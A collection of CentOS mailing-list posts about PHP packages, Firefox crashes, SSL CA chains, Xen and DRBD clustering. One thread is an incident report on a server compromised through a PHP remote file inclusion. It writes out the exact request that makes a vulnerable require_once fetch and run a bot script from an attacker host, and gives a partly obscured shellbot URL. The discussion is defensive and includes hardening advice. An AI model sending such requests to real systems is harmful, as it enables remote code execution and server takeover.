Re: [CentOS] PHP 5.2 or greater availability
On Monday 18 May 2009 19:46, Kaplan, Andrew H. wrote: Is there a repository that has php version 5.2 or greater available for use with the Centos 5.3 distribution? This includes the development libraries package. Thanks. Just finished compiling php 5.2.9 from the sprms I found here: http://oss.oracle.com/projects/php/ works fine despite the slight Oracle smell - but they should really make a repository. Once used Jason Litka's repository but it sees a bit stale now: http://www.jasonlitka.com/2007/11/16/upgrading-to-php-525-on-rhel-and-centos/ enjoy Sam ___ CentOS mailing list CentOS@centos.org http://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] firefox is incredibly unstable
On Thursday 16 October 2008 07:26, Michael Simpson wrote: Ditto here. Have you run an rpm --verify to see if you have corruption problems? Have you mixed installs from (possibly conflicting) repos? I suspect one of those two. Have you checked your hardware (memtest, etc.)? If the system is haeavily loaded, have you checked to see if it's a heat related problem? ok thanks guys, the firefox RPM was normal and the system is solid 64bit, it's just Firefox that has problems. In the past crashes could be triggered just by simple UI interaction, scrolling or click/drag, etc. Seemed like any time it would use GTK widgets it was on thin ice. I run KDE so I wondered if any other KDE users have this problem. But I am running the mozilla.org binary now, so I can get crashreporter to work - but it doesn't... https://bugzilla.mozilla.org/show_bug.cgi?id=460254 anyway this is not a CentOS issue it seems. But thanks for letting me know. Sam ___ CentOS mailing list CentOS@centos.org http://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] [OT] what crashing means WAS: firefox is incredibly unstable
On Thursday 16 October 2008 12:08, bruce wrote: when you're saying crashing, what exactly do you mean?.. is it the app that crashes.. is it that your mouse/keyboard no longer works?, is your system still running (you can ssh into it), but you can't move your mouse??? it crashed, it asploded, it died, went bye bye, sionara, adios, headed for the exit http://en.wikipedia.org/wiki/Crash_(computing)#Application_crashes that is different than a system hang or a desktop freeze or an app freeze which are the other conditions you are describing, and need to be resolved by manually killing the offending process or with the power button. regards, Sam ___ CentOS mailing list CentOS@centos.org http://lists.centos.org/mailman/listinfo/centos
[CentOS] firefox is incredibly unstable
does anyone else have major probs with Firefox as installed on CentOS5? ever since the RPM for FF3 came out it has been crashing daily. Usually when I use Save As... or Browse... or anything else that brings up the Gnome file picker. After the crash I re-start then the file picker works for a while. Sometimes it just takes scrolling or click+drag an image or some other random action. BANG your'e dead. Very frustrating. Now today it is just crashing randomly, I am not even touching it. Maybe one of my plugins, I know. I guess I will run it with debugger/strace. but does anyone else see this? $ rpm -qa firefox firefox-3.0.2-3.el5.centos $ cat /etc/redhat-release CentOS release 5.2 (Final) $ rpm -qa kdebase kdebase-3.5.4-18.el5.centos ___ CentOS mailing list CentOS@centos.org http://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] firefox is incredibly unstable
On Wednesday 15 October 2008 13:27, Stephen John Smoogen wrote: ever since the RPM for FF3 came out it has been crashing daily. Usually when I use Save As... or Browse... or anything else that brings up the Gnome file picker. After the crash I re-start then the file picker works for a while. should have mentioned that neither crashreporter nor talkback were coming up. Once in a while I get Gnome Bug-Buddy which fails to do anything useful. Seems like someone at RH tinkered with mozilla's crash handling Not for me. I have had 1 crash in 2 weeks. I would look at doing dealing with the usual suspects: 1) Remove any extra plugins you added. 2) mv .mozilla .mozilla-bad-$(date -Im) and start over. If the problem does not go away then it is some other item that is causing the issue. Well I need my plugins to get work done so I installed the binary from mozilla.org in /opt/ and symlinked to that, seems to be better so far. This is what I used to do to get the latest version anyway, so if it works will just stay this way. If not I'll get on bugzilla and pursue that. thanks Sam ___ CentOS mailing list CentOS@centos.org http://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] [SOLVED - Sort Of] Installing a new VM on a xen box.
On Thursday 09 October 2008 12:31, nate wrote: Now it looks like Red hat has woken up and seen it is a dead end too and is moving to KVM as you mentioned. where did you read this? I have just started with xen too but I don't want to be left hanging... ___ CentOS mailing list CentOS@centos.org http://lists.centos.org/mailman/listinfo/centos
[CentOS] install Verisign/NetSol CA bundle
I have a client-provided SSL cert that seems to be provided by Verisign but issued by my good friends at Network Problems. I thought this was part of default cert.pem, but maybe not. The docs on Verisign's site are... ahem... unhelpful. I have what I think is the correct CA chain for this cert, but still trying to determine what marketing terms overlap with what reality. But how is it to be tested? here is the info ( nj.pem contains the Certificate and the Private Key ) $ openssl verify nj.pem nj.pem: /C=US/postalCode=9/ST=OH/L=Columbus/streetAddress=4111 Ave./O=XYZ Inc./OU=Secure Link SSL Pro/CN=xyz.foo.com error 20 at 0 depth lookup:unable to get local issuer certificate $ openssl x509 -noout -in nj.pem -issuer issuer= /C=US/O=Network Solutions L.L.C./CN=Network Solutions Certificate Authority So if append the correct CA certs to my nj.pem, then 'openssl verify' should be happy, is this correct? thanks! ___ CentOS mailing list CentOS@centos.org http://lists.centos.org/mailman/listinfo/centos
[CentOS] xen and nvidia
has anyone had any luck getting nvidia to work with the latest xen kernel under x86_64? I found an unsupported method involving IGNORE_XEN_PRESENCE [1], but it doesn't work for me. Everything google turns up seems to be a year old. prob nothing has changed but I just wonder. [1] http://www.nvnews.net/vbulletin/archive/index.php/t-95483.html maybe I could I run a xen dom0 under vmware? nah... ___ CentOS mailing list CentOS@centos.org http://lists.centos.org/mailman/listinfo/centos
[CentOS] mystery process unit
Ok, dumb question. On a certain LAMP server I am seeing in 'ps auxf' a process called unit with no arguments or other path info. It has a fairly low pid, 3041, indicating it might have been started soon after reboot (last week). but ps says it was started yesterday, I don't see it on any of 3 other CentOS machines. It is hard to google for such a generic name. So does anyone either know what it is, or how I can find out more about it? Sam ___ CentOS mailing list CentOS@centos.org http://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] mystery process unit
On Tuesday 12 August 2008 09:08, Mr Shunz wrote: maybe you should check with lsof -p 3041 and see which files/pipes it uses to have a clue. of course! slap it's a perl w0rm that was uploaded last night, now killed. Now to determine how it got in. I found some output in the main apache error log that looks like wget was used to download a shellbot. But I can't figure out how wget was called, may be some PHP exec() call that is unchecked. But I can't find it on the system yet or the data files it uses. chkrootkit says all is clear. mod_security is now being installed, belatedly. This server has only been up 1 week, sheesh. thanks Sam PS here is the link to the shellbot that was used, in case anyone is curious. I break up the URL to protect the innocent: http://usuaBREAKrios.lycos.es/BREAKw0rms/info.txt have searched it and don't find anything special on the main security sites. Is it new? ___ CentOS mailing list CentOS@centos.org http://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] mystery process unit
On Tuesday 12 August 2008 10:16, Rainer Duffner wrote: Anything in /tmp ? Disable register_globals and allow_url_fopen. Set open_basedir for any virtual hosts to the absolute minimum. allow_url_fopen was enabled on one of many sites. A developer put in an unsafe php include(). This allowed the w0rm to run a remote PHP script which used exec() to fetch and spawn the shellbot. Pretty standard. But it also did a decent job of removing itself from the filesystem. Lucky I noticed the weird process this morning, no harm done it seems. I have mod_security installed now, but I tested a similar attack, and sadly, it still succeeds as long as allow_url_fopen is on. But this is not CentOS related. cheers Sam ___ CentOS mailing list CentOS@centos.org http://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] mystery process unit
On Tuesday 12 August 2008 12:18, Rainer Duffner wrote: (I think it requires both register_globals and allow_url_fopen to be on, but I'm not sure if you can't get it to work with only allow_url_fopen) as I just found out, it can, as long as the PHP developer was even more naive than usual. The offending line was: require_once($_SERVER['DOCUMENT_ROOT']./db.inc.php); then a request like: http://victim.com/index.php?_SERVER[DOCUMENT_ROOT]=http://badguysit e.es/bot.txt will do a fopen() for http://badguysite.es/bot.txt/db.inc.php;, which is good enough. And yeah this works with register_globals off, which surprised me. And also surprised that mod_security has no problem with that URL. I am going to raise the issue with them. cheers Sam ___ CentOS mailing list CentOS@centos.org http://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] mystery process unit
On Tuesday 12 August 2008 13:39, Jeff Kinz wrote: If you don't mind I would like to use it as a real world example for a class I'm teaching? I will remove all the identifying information first of course. Sure go right ahead. Unfortunately I have tons of real world examples... :/ cheers Sam ___ CentOS mailing list CentOS@centos.org http://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] mystery process unit
On Tuesday 12 August 2008 15:44, Jancio Wodnik wrote: Hm. And what about selinux and httpd ? Selinux is securing httpd from this attacks, right ? Selinux was disabled ? good point, SElinux is set to permissive on this system because we had to get up and running in a hurry and support a lot of legacy apps that do unusual things. apache needs to read/write various config and include files that are in non-standard locations. We tried it enabled and nothing worked. in the audit.log I am seeing where it wanted to deny the bot a tcp_socket. So that would have been good :/ Maybe enabling selinux but leaving httpd opened up would be appropriate for the time being. Is that possible or advisable? audit2allow wants to allow a lot of things. ___ CentOS mailing list CentOS@centos.org http://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] drbd strategy
Thanks guys for the info. I understand that the secondary machine needs a /var too while in standby, and since it can't also mount it as part of the DRBD array, then it has to be a vanilla partition on both machines. Thanks for clearing that up. On Saturday 31 May 2008 09:28, Filipe Brandenburger wrote: You would be better off by using a DRBD partition for /var/lib/mysql and leaving the rest of /var out of DRBD. But DRBD only replicates entire physical devices right? So I would have to re-partition... if so I can't do that. But we could move mySQL files to /home or something as well. Not pretty but it should work. ___ CentOS mailing list CentOS@centos.org http://lists.centos.org/mailman/listinfo/centos
[CentOS] drbd strategy
I have an existing in-production LAMP server running Centos 5.1. It uses physical partitions on top of hardware RAID1, having / /home /var and /boot on separate partitions. We have a near-identical system I am thinking of bringing in as a DRBD/Heartbeat companion. One solution may be to use csync2 [http://oss.linbit.com/csync2/] on /etc and /usr/local (the only areas that will differ from the stock CentOS). Then setup DRBD for /home and /var. From reading the docs it seems we have to use external meta data on the existing partitions. Other than that, anyone have any caveats or better ideas for this setup? Also - each has 2 NICs. Can Heartbeat do its pinging over the WAN (eth0) with eth1 dedicated to DRBD only? Is that how it is supposed to be, or should we use the serial ports? Sam ___ CentOS mailing list CentOS@centos.org http://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] Fault tolerance with webservers
Interested in this discussion too, for reasons recently discussed... On Tuesday 27 May 2008 09:07, Fajar Priyanto wrote: For a starter, there is a very simple tool for this. It's http://www.inlab.de/balance.html 2. RedHat Cluster Suite dan Piranha (http://www.redhat.com) 3. Linux Virtual Server (http://www.linuxvirtualserver.org) Do all of these (or IPVS or Cluster Suite/GFS) take care of real-time sharing of storage (sessions, database, files, logs) between all nodes? For a LAMP or JEE or any other HTTP stack serving anything but readonly static files, this is usually a requirement. GFS is for sharing filesystem I know and there are howtos. So would you put Balance or LVS on top of GFS, or... Would HA/DRBD be on the short list? http://www.drbd.org/ in our case we have a two-node cluster anyway so this seems like the most straightforward option. Or would something else be superior, more up-to-date? Sam ___ CentOS mailing list CentOS@centos.org http://lists.centos.org/mailman/listinfo/centos